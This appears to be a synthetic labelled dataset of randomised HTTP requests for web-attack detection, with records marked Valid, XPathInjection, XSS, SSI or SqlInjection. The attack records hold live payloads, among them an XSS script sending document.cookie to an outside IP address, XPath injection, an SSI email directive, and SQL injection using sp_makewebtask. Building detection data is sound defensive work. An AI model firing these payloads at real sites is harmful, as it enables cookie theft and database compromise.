Cookie2: $Version="535"
Date: Sun, 20 Dec 09 21:22:44 UTC
ETag: W/"m4CjLAtP7IC3FCI0_aT"
Expect: 100-continue
From: afReCmmd@ea5oe.uk
If-Modified-Since: Fri, 09 May 08 08:07:27 CET
If-Unmodified-Since: Mon, 12 Nov 07 03:46:59 CET
If-Match: *
If-None-Match: "rLGmxmGJWEzAa5Kdml"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.4
Pragma: s8u='k9'
Proxy-Authorization: l4bt5n at4Je=nnfle
Authorization: Digest response="ffBeA0ECF82C6E2c8674BaEBC1caE9C0"
Range: 2506-
Referer: /nkyu/6acgu.wav
TE: gzip;q=0.8,deflate;q=0.9,trailers
Trailer: If-Unmodified-Since
User-Agent: iey1suSoetua6wd
UA-CPU: StrongARM
UA-Disp: 5366,342,32
UA-OS: Linux
UA-Color: color16
Via: 9.0 51.28.53.14
Transfer-Encoding: gzip
Upgrade: hgitd/1.0, qTyqae/6.4, rR3th/0.4
Warning: 693 www.nedn.shtml "onrntmt5TDe1feiCe" 
X-Forwarded-For: 162.29.213.245
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1784
Start - Id: 7631
class: Valid
POST /eRjUO4xlyF3zUi6Lo/rPFsnodeBh/e8excblaCrDfgQsdm.php? HTTP/1.1
Content-Length: 227
Content-Language: ze0n
Content-Encoding: gzip
Content-Location: /enEe/1aueaEi/rmpfTaxg/ioet/iylB.tiff
Content-MD5: c2JudGVlYXhyc1hwc2VldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 25 Oct 07 03:37:59 UTC
Host: www.tefas2l.st
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-japanese, x-mac-chinesesimp, iso-8859-7;q=0.9
Accept-Encoding: *
Accept-Language: ohurilt-whneAtf, aaEc1i-enawen, eneme-sd;q=0.4, tcng-t7ep8br;q=0.3, el-Rwk;q=0.1
Cache-Control: max-stale
Client-ip: 105.240.119.173
Cookie: itz=lCrcz ;ts2he;etueaxhRIup=7awaK0
Cookie2: $Version="03"
Date: Thu, 04 Mar 04 21:00:57 UTC
ETag: "qi2unb4DKTAP9F9lw"
Expect: 100-continue
From: 5o2toN@trwo.com
If-Modified-Since: Sun, 11 Mar 07 17:50:34 GMT
If-Unmodified-Since: Sun, 22 Jul 07 22:27:28 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 18:45:58 GMT
Max-Forwards: 826
MIME-Version: 7.0
Pragma: a2ehoRm=iKesnx
Proxy-Authorization: ie1iab matdiace=hbdiO
Authorization: NTLM c3RlcnRhZWZyaG5vbWV0bXdldWh0ZWdNR3llZnplOWFt
Range: 70517-,7-,66190-
Referer: http://www.noitdoge.gov/eotgrT/dzlles3/oanStcu.png
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: ah1stMiden7th2
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: 1.8 8.135.106.107:499, and/5.3 www.iruottye.html, 5.3 127.84.126.16
Transfer-Encoding: identity
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

1ree0=wu4qingO&oa=8551037&uurr2nielnbiee=j2sInhzb1 bcoeg&penE8o=oiafr5tt&aorfdM3eeo=ie&drdhn=Fd-httpsiliwgeto leacceptybgsound&yatld=hd5bn1akwe&heehiTtsq=ctoeeybS&rwlmton8=Rnhal&Oeyhrfteo=w_tppM.G7V&ieimthsoggias=RlRDTe0ehaving

End - Id: 7631
Start - Id: 48900
class: XPathInjection
GET /v1a/hJJuGHaJy03SA7unl6c/PejI._Z-/tn1sTadew2stpa2/uEherhsNci3aralrx/NLio2ttiuossenhiyrct/x14mb/Eauss1bod6mr/lgl/wXxpi-k/rUoeRBDP/aqI@VfNTmgPSbF.shtml?1rTedotsLeg=4t2elfuhabnh4oIs&oFlthhe9I=rlr%27++or+++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i+%2B++j+++%2B+++k++%2B++l%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+%27ie3mgile%27+++%3D+%27+++++1rT%27+++++or&hal4fmeeaema=netcatieqo9t%3For&1marrgbtm=n9Ostrhwaae&cfstAoahOaclnow=s7GTMbwJt.6&tr=83013&NEpUsock_streamZBw=o+u&webqtiornh7oe=aeV7d&yRKhtpassAorNxu1=didnr&gotripr=863955&lnto4nzoDd8eab=ys3+sixp_bj7bi&niuestcsfLjoeO=00917406 HTTP/1.1
Host: www.omayR.be
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.3, euc-tw, macintosh;q=0.9
Accept-Encoding: deflate, gzip, compress;q=0.9, identity;q=0.5
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 153.160.118.93
Cookie: oT=eetncIo
Cookie2: $Version="0"
Date: Sun, 18 Jul 04 24:04:34 CET
ETag: "EZ.0JafyIzHcH8cl0G1T"
Expect: sbtnm
From: nui8@hgERemx.net
If-Modified-Since: Wed, 07 Jan 09 08:42:59 UTC
If-Unmodified-Since: Thu, 07 Jun 07 23:56:09 GMT
If-Match: *
If-None-Match: *
If-Range: "cpyrrq6ZO6pNfNk8Iz"
Max-Forwards: 1
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest username="hatewte"
Authorization: Basic Y3VpSmR4dW06aWhocg==
Range: 87-22
Referer: /xyin.msf
TE: gzip;q=0.7
Trailer: Warning
User-Agent: csa54e9tpb1sdpytlez
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 978x515
Via: 4.0 www.run6uEoh.html, 6.0 225.8.95.174, 6.6 220.88.128.160
Transfer-Encoding: compress
Upgrade: o6r/8.3, gsh/9.3, o8o/3.8, 2oIojh/2.5
Warning: 712 39.177.49.129 "e9wsavnreymOd" "Wed, 28 Jun 06 09:25:28 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48900
Start - Id: 47589
class: XSS
GET /eiyttrapaabn4nhoatt/rU9AM_l/rHvPc7EVVghLYDky/tbsn/20I@T/oG8ujm/8NOVKv7SZf2yfwg2tkw/azIgc97PFTsDEMM7zYYB.tiff?UICdl2.G2XA=xcgrnpet&ronde=95437224&uiAs=%5B%5CxC0%5D%5B%5CxBC%5Dscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F141.69.117.195%2Filin.php%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E&ss3t7en=5je9Dvnudlwi&zneyemb2neHehot=njehreplacefeha&6teDcnraet=rni5&raXhr8enmwrorE=nsu HTTP/1.0
Host: www.0neelFeM.org:80
Connection: ni03
Accept: application/zip;q=0.9, application/*
Accept-Charset: isiri-3342, iso-8859-8, x-mac-ce, gb2312
Accept-Encoding: *
Accept-Language: aRE-x59t;q=0.7, dqpee-uqeie;q=0.0, qiesh-ehnngp;q=0.5, tea1n-I0
Cache-Control: no-cache
Client-ip: 89.98.57.72
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Thu, 29 May 08 20:32:13 UTC
ETag: "_-rykg0hR4YVN2f-QVb"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Tue, 01 May 07 05:37:04 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: "NdR7AF0p89vmqDIw"
If-Range: Sun, 18 May 08 22:22:08 CET
Max-Forwards: 520
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: Basic dzJob2FjOmVpcmdFbnI=
Range: 849916-
Referer: http://ntncnne.ch/FeTsfcee/neenkelA/a2hav/nrlHrlnT.msf
TE: chunked,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: n9terso
UA-CPU: StrongARM
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: FTP/4.6 www.estph.gif, FTP/6.4 118.117.127.105:063
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47589
Start - Id: 39209
class: SSI
POST /sn6tytNe/e6FF_V/eTc9fiynmIeii5e/nC@016DaHH.fYc/f@He0dJ9VxJjJvBF/ljYpfxm4aFx/eeexdbsbsertrmegoae/pzxg/n7/ocliS0noaham3rnag/sei/xR0n7G5.exe? HTTP/1.1
Content-Length: 413
Content-Language: e,n0riItya
Content-Encoding: identity
Content-Location: /aDsfi/hcsiasm1.doc
Content-MD5: bmlkbGFkaGRubjRlbmVFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 09 20:22:39 CET
Last-Modified: Sun, 31 Dec 06 07:04:36 CET
Host: 8.166.203.110:34
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, iso-2022-jp;q=0.1, big5, koi8-r
Accept-Encoding: deflate;q=0.1, deflate, compress, identity;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 185.235.27.5
Cookie: RTR@wnlp=39507048
Cookie2: $Version="40"
Date: Fri, 10 Nov 06 11:07:14 UTC
ETag: "Ut2cWJETByQXuz6RmNJ"
Expect: 100-continue
From: egngmnl@let9lo.net
If-Modified-Since: Sat, 05 Nov 05 01:52:11 UTC
If-Unmodified-Since: Tue, 01 Nov 05 05:45:05 GMT
If-Match: "HnWcZevZ@a7miGe0K"
If-None-Match: *
If-Range: Fri, 17 Oct 08 11:20:12 CET
Max-Forwards: 697
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: sooi1s zastsf=tBmrs
Range: 3300-689,-21
Referer: http://7nsco.st/diFtN/euftaery/e8tE.doc
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: nEvO9y/2.0
UA-Disp: 375,7789,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 486x328
Via: HTTP/2.7 www.frielg2f.gif, FTP/4.1 www.ltlttda.tiff
Transfer-Encoding: compress
Upgrade: mwT/9.9, pqe7ei/0.1, ilshda/6.7, sDi/9.1, esice/0.8
Warning: 080 161.106.107.38 "ptynoda1w" "Wed, 05 Oct 05 18:34:52 GMT"
X-Forwarded-For: 10.24.21.76
X-Serial-Number: 4765226560917916
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jLCGhVX=8QpKMyuhv&igeEgteuos3e4la=Mts tueeiiiArle&qpnoMrplmwi6=<!--#email fromhost="www.8g2emk.com" tohost="mailbox.Gelrl.com" message="iE20qu casatt 3tei tleu" fromaddress="h3iq0.com" toaddress="bu9t.t9mbmr.com" subject="r" sender="vs.com" replyto="mnhuasd.com" cc="aen" inreplyto="skonZ v6em ls" id="luemail" -->&iattE=lejPY9bsEeu9d8ohtq

End - Id: 39209
Start - Id: 33325
class: Valid
POST /PRV/Ldld7-U9IplELlogL/eugahaOisde0l/e9qsnwamlgI3ccm/rueLoaemNrnh4in/tfVhopBsHVlqI3Cn/e-Jfk4aQfGGVm/nLOqsc0Bk0D1y.-.DYy/nlcwntalhfhoNersohi/irwH3/79tmppqGHvT.-/nzedouTsn3katefntnr.jpeg? HTTP/1.0
Content-Length: 210
Content-Language: rnwo,vat6
Content-Encoding: compress
Content-Location: http://www.gtbRC7lo.fr/eedU3sh.zip
Content-MD5: czZoa2VIcnRiYm5yd2ljZg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Dec 05 07:12:38 CET
Last-Modified: Fri, 10 Jun 05 19:33:43 CET
Host: 94.116.163.236:80
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.4, x-mac-korean;q=0.5, x-mac-greek;q=0.3, utf-7;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=99
Client-ip: 29.172.196.230
Cookie: sidie=odry6b40W);pvgtiTy=srk
Cookie2: $Version="03"
Date: Sun, 17 May 09 12:24:49 UTC
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Thu, 25 Oct 07 24:50:38 GMT
If-Unmodified-Since: Sun, 20 Aug 06 13:44:02 GMT
If-Match: "nMIXg@FZIvjktYpTNuk"
If-None-Match: "jEA5RWFv1kKFKd0dLs"
If-Range: "nOonB4906D@0Hfvpea1"
Max-Forwards: 139
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest response="82Aefeab6F6E793D521a04Cc9Ec2D0A4"
Authorization: Basic cjRBc29ueDpuZHRs
Range: 24826-23231,5-,7421-11658
Referer: http://9rtc.cz/i1Ahi/u3rderet/6dys/iieOjeur/p0bcote.js
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/7.4 (compatible; stmyr; Unix; rU5enn; 8runbQlz)
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1181x772
Via: 6.7 www.edresc.jpg:561, 0.8 www.weAp.htm, FTP/1.0 190.222.77.247
Transfer-Encoding: compress
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 6047064936
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

ae7a=TuihehNflnmsale1sA&no=i&Inox=Eengmsdelete\htpasshf zt&ateui=itrghrs)m opt et&1o&tsetmhtle=iiframe&nosw=e&dtnac9ac=r]6tcnida&Ipetc43VH=58&neenyoaaofrnS=27&pootnt7seo1=72&Noioaihti=n Id&eeai=tO.1-E7L

End - Id: 33325
Start - Id: 48961
class: XPathInjection
GET /2xD1mXmSo3MevEfVPN/cFmJFIoiWy6HRj/plinka/ieesRM/druAe1Xdhrt/aZ74Akkv_GxcIzAF2/beb.pl?bu66B2cmdC=inputprocessing-instruction1tbc&7ShomeJM_betweenlinkoAX=tX2Mv7HUPoI&rNa4itTsrt=n570hcglEeaE3ihh&ffsd=chaiThojer&xQI2Y0yjaC=%2F%5B&IkoTu9r=t9dT.I&ti=0+or+++1%3C+eix%2Fta%2Filasye%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D440%5D+or+345%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&6sstA6eaf4w=airkw%7Ceiyxcx&igcbemeesnrnelr=%25elikeservicesccmeu&Zkhgo=2667857 HTTP/1.0
Host: 2.188.105.135
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity
Accept-Language: sNc7oo-eit, ieoomevE-tckrnj
Cache-Control: max-stale
Client-ip: 170.112.198.15
Cookie: hoaDdMoywvjmt=52;rVWYiqa=y)b' rov8~e;
Cookie2: $Version="580"
Date: Fri, 26 Oct 07 01:03:41 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Wed, 16 Jul 08 03:13:50 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Oct 07 01:37:11 UTC
Max-Forwards: 979
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: Basic aHNoYmNkOm5mZUllZWhl
Range: 5-
Referer: /eHarm/m3qh.pdf
TE: trailers,chunked;q=0.8,chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: athog (i@qrsgv)
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.4 www.otitnae.jpeg, 9.5 www.hleheOth.tiff
Transfer-Encoding: compress
Upgrade: 6cwot3/1.9
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48961
Start - Id: 20373
class: Valid
GET /Iz@BAoeCGcTB5nY/81XG9v/sO.p_Mb7Gk3OUNk5aA0/sHKOaHsbWbn6ob2as/9stetyeeaonifeton/n3QKMYeHORERSRxrW6./eJCBParTh_Wf/xmlwp-UAB7RF/qDvpMDOWb/yzE.sock_stream6QYN/oIyrgvN/a0hL.png? HTTP/1.0
Host: www.lonLdiaeh.net:80
Connection: close
Accept: text/*;q=0.8, audio/*;q=0.0, image/gif;q=0.3
Accept-Charset: utf-7;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 128.199.231.69
Cookie: anese0d7m=446;458a0Ujz=]qxaF
Cookie2: $Version="095"
Date: Wed, 09 May 07 08:40:48 UTC
ETag: W/"yikpggON5L8XCKhgTO"
Expect: gaohGlrt=5ata9nmg;qoeroy
From: ueaw@nsel.fr
If-Modified-Since: Mon, 08 Oct 07 21:53:12 GMT
If-Unmodified-Since: Fri, 23 Oct 09 17:22:19 UTC
If-Match: "R3BAtLctNgxyerZtI"
If-None-Match: "Kfgf0N_mMjZFu9Os"
If-Range: *
Max-Forwards: 154
MIME-Version: 0.0
Pragma: ic='q'
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Digest cnonce="idnIcjtd"
Range: -9710,4363-45984
Referer: /haOCa/aeoehes.msf
TE: chunked,trailers,deflate;q=0.3
Trailer: From
User-Agent: Mozilla/0.6 (X11; U; Linux i386 0.5; tt-lq; rv:9.5.1) Gecko/70643026
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: tlNec/2.4 www.iirsmSe.jpeg, uyin/3.1 33.43.28.31:2, 9.5 102.182.126.157:8513
Transfer-Encoding: 1cet; lemn=xvyie
Upgrade: si8aut/4.9, hxi/6.6
Warning: 768 www.egeqe.js "uqutLw7ebt4c" 
X-Forwarded-For: 126.30.228.195
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20373
Start - Id: 22202
class: Valid
GET /ihjrfxda5gzsjtsi6/gqXMVfRHYx3aR/eIUS4O/AUxzvFIBrn6C/JNrTwn/dtnettui/qx.mdb?tyaao=254398021&tttUreonri97=nwim+l&IRstdinSPssock_streamff7FN=mjoe&oE=doonuesegupp&cttordsTboaHno=e%7Co2&as0nammmersid=oakeservicesse+olnswhereses%2Ft&icaeocmyba5oHyc=uto1%28bodypnFdr&-x_zHrm.0_htaccesY=%5DAt+l%25rGrcp&0ulbY=dohttpsn&mo0ag=tv6OkhLeGx&d93yiai=990997&d9_x9qGNM=Taoiuj&hk32GT=aiqootq%3DwleR&elog7BG=tsN8a HTTP/1.0
Host: www.ulmioa.org
Connection: keep-alive
Accept: video/quicktime, image/gif, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: idrjsao='a'
Client-ip: 120.231.52.234
Cookie: obH9ihomeP=98;.fOYallC1lsJ=iiormo;o1=625407255
Cookie2: $Version="80"
Date: Mon, 18 Feb 08 20:52:40 UTC
ETag: "kEP7UECEDPz-9AKStT"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Fri, 04 Jul 08 13:43:21 CET
If-Unmodified-Since: Thu, 22 Sep 05 08:42:33 CET
If-Match: "UhKNxTdMSbuOV1@ToJ0A"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: Digest qop=3o1ooi
Range: 35375-8,82945-
Referer: http://www.3thmperE.gov/1odndaa.php3
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 8.8; ja-ke; rv:2.8.8) Gecko/36223780
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x8565
Via: iTt5be/0.7 www.tlmdeTp.htm:17, FTP/8.4 www.haiToahs.jpeg
Transfer-Encoding: compress
Upgrade: dtt6ee/8.3, tfTa/8.6, e3o/6.1, snle/8.8
Warning: 355 197.51.154.139 "WsvbdamfbsbE0te03Tl" "Mon, 16 May 05 24:46:07 UTC"
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 22202
Start - Id: 13946
class: Valid
GET /tignscxVQ3OTOOsDR/5nEeeemneeop/qeYuKlHagroup by3ZZ/tashheivelttps/eDoD/cI5BW/4p1LJkqR/9iN@.oJffcO6d.nsf?lyavg=zpassthrut+e&ssrsemy7fsqg=63564059&nTtqarAvd5=5059&rrrshp3cie=hrosruc86adnnt HTTP/1.0
Host: www.lhdnveqe.be
Connection: close
Accept: image/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=33
Client-ip: 45.95.2.145
Cookie: setyaxeitktrl=799000;n0cosUnesjin7Od=ceiislhsnnrlA;uhutaoosralbsze=da3systemcmdstoll;aCPleeeOtlsjt=geSehzrN:ie?|d ;liwi=vbscript7l;c
Cookie2: $Version="03"
Date: Fri, 17 Oct 08 24:32:24 UTC
ETag: W/"uc3AZU3AIgMsfoMc"
Expect: 100-continue
From: rn6Njecb@1xoroo.st
If-Modified-Since: Wed, 06 Oct 04 13:58:31 GMT
If-Unmodified-Since: Wed, 28 Apr 10 12:27:34 CET
If-Match: *
If-None-Match: "SLP4OWBvyzBZ4xrfFX"
If-Range: Fri, 02 Dec 05 24:36:09 UTC
Max-Forwards: 0501
MIME-Version: 8.5
Pragma: a=3tph
Proxy-Authorization: Basic ZTZzcmVzUm86aGFld2VJbWw=
Authorization: Digest algorithm=MD5-sess
Range: 4-17952,40583-6085
Referer: /uers/RchEeU/erkao/unEre.mspx
TE: trailers
Trailer: If-Modified-Since
User-Agent: weamesOfxhakdt
UA-CPU: x86
UA-Disp: 7939,4903,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7780x7588
Via: 1.1 211.95.247.78:208, gfmA9/8.4 www.giRataoe.gif
Transfer-Encoding: deflate
Upgrade: erdscE/5.2, 4oa/1.0
Warning: 669 www.eavortz.js "DSa8rfspiemkwse7" "Sun, 22 Feb 09 17:32:26 UTC"
X-Forwarded-For: 222.27.179.251
X-Serial-Number: 5967398849780
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13946
Start - Id: 24968
class: Valid
GET /ohtssqnrhadeeugwdrae/ohY/uVsODbHi89gQW/eL/s_vi2vXoL1/Xfrom/dZ/r-kze/pgKnVTnUECs1k2y/imsbn/oxrh/t6errtee.php4? HTTP/1.1
Host: www.rktnliLuss.it:80
Connection: Aniseh
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.6, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 77.220.63.231
Cookie: neccr6tg=91330;xpyu1raldtmh8l=0t6bsosdadmet;tsiei=mxntov2SntItHedgroup by~;UW@Ddrop=e7enentt;eeha=ad4ask;tphqnHaiEelcV=iz1edpteeg
Cookie2: $Version="930"
Date: Thu, 03 Nov 05 13:35:39 CET
ETag: W/"TwUFugKiaNsse5Cr"
Expect: 8xdsh
From: eo5nreal@6phanjveAh.org
If-Modified-Since: Sat, 25 Apr 09 12:45:37 CET
If-Unmodified-Since: Fri, 20 Aug 04 09:58:26 GMT
If-Match: *
If-None-Match: "-RM7ggQ_Rd_lFJt6"
If-Range: *
Max-Forwards: 424
MIME-Version: 9.8
Pragma: naa=50ivtsft
Proxy-Authorization: n39Msi agpv8i=to9rstt
Authorization: bEar b2nNc=eooLiebl
Range: 528-04
Referer: /dsie8a.cgi
TE: gzip;q=0.7,gzip,chunked
Trailer: If-Range
User-Agent: 3uhhtos24/6.0.2
UA-CPU: PowerPC
UA-Disp: 1036,157,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8440x807
Via: 4.2 157.135.140.40, HTTP/9.2 www.7hepgv.jpeg:7411
Transfer-Encoding: gzip
Upgrade: hae/6.6, tnaNlo/3.6, ro4r/5.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 95297719813252220889
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24968
Start - Id: 41125
class: SqlInjection
GET /eU.-Z.reWy-sP-hZQ/pftmwknd/ntihsxecsnfw5/E-yWm/5aaeUecrrtar/0em/aLKdcFglWeh/efo8@ZG7bodyS4n8/3necraeI5mstcM4b6.sh?tu=ee%25exec%29gasr&3odobnatt=%27%3B++EXEC+master.dbo.sp_makewebtask+++%27c%3A%5Cinetpub%5Cwwwroot%5CRty.gif%27%2C+++%27SELECT++reienmu+++++FROM+++ust10h+WHERE+++xtype%3D%27%27U%27%27%27&TP@vy-B-DUfI=g%3A&e9asiTuefe8Erbo=69832 HTTP/1.1
Host: 28.38.243.87
Connection: c2te
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, compress, deflate;q=0.0, identity;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 104.85.29.24
Cookie: hz=hzuoezu0;allEoP=elsah70nO3oownean;9OM5_fG=tFtwC_;Qxre4riajli=oB5.;aw8a=800412;oiokn1ebsnaAi0e=eEG
Cookie2: $Version="3"
Date: Tue, 20 Sep 05 05:19:50 CET
ETag: W/"2aTlPu50dA@UKfxeZq"
If-Modified-Since: Wed, 12 Mar 08 05:51:48 GMT
If-Unmodified-Since: Wed, 15 Apr 09 07:47:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 59
Pragma: no-cache
Authorization: kknwh 9eoe8nl=fNaroe
Referer: http://www.0ry6na9l.gov/eusab.swf
User-Agent: G7xatyds5onDrt
UA-CPU: 68000
UA-Disp: 106,924,16
Via: FTP/7.2 www.molptO.jpeg, 2.1 www.4dis.js
Transfer-Encoding: deflate
Warning: 894 www.t2teem.tiff:4 "hItafp" 
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41125
Start - Id: 41632
class: SqlInjection
GET /rN3BLbUOcWSjk.tx4tEf/las6HwSn7nOetuizrldr/9Hq8bNSpHy67R/ignsxj3u/ZBOwm9en5lH0/9_flSVYIqVmGhZBrd.0x/aonrFletga2g/ehRsE4nVsbuo@3sKfHj/mteOzVDhlugrb92g/mlqm/w5q3Nsock_streamfQrLzF0/loawu0s5i7.exe?szele=OR+%27sjiow%27+LIKE++%27Sim%25%27&ndLB_script-6OnJI=setmpja&ExceisoiEs=+fn&uieoha=rTk&rI5acoiytt=%5Ceegi%40 HTTP/1.0
Host: www.tlunD.biz
Connection: keep-alive
Accept: application/*;q=0.1, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate, identity;q=0.5, gzip
Accept-Language: *;q=0.5
Cache-Control: max-age=332
Client-ip: 228.176.17.121
Cookie: zuncLSi5A-=91519;WgVDTRMvbscriptzsh=wZuqX;cn5Igtsyhavon=m;h2fsns=dc4msosnpobinyn:;7u=ramrueyea~;iEtnetf=formaeeaouue
Cookie2: $Version="5"
Date: Sat, 15 Sep 07 23:39:27 GMT
ETag: "-cn@c9fe6TG-hI_N3z@F"
Expect: dSei2edr=aNexTn
From: xrtw@gme1s0.it
If-Modified-Since: Tue, 18 Nov 08 15:47:04 GMT
If-Unmodified-Since: Fri, 04 Nov 05 17:29:12 GMT
If-Match: "Dv-.r08jh0juv3vdy"
If-None-Match: *
If-Range: Fri, 08 Dec 06 11:07:01 UTC
Max-Forwards: 543
MIME-Version: 5.2
Pragma: egNnasew='sade'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: izeorn 4gth5pdm=nati4t
Range: 53962-110288
Referer: http://ueteanz.gov/aroW9rg/ot7aNa/eaxk.png
TE: trailers
Trailer: Transfer-Encoding
User-Agent: e956lT0. http://www.0trll.org
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 7.1 37.150.156.240, aayE/0.2 99.81.231.24:7227, 9.6 80.152.60.92
Transfer-Encoding: compress
Upgrade: ncT/8.9, 9ri4/6.4
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41632
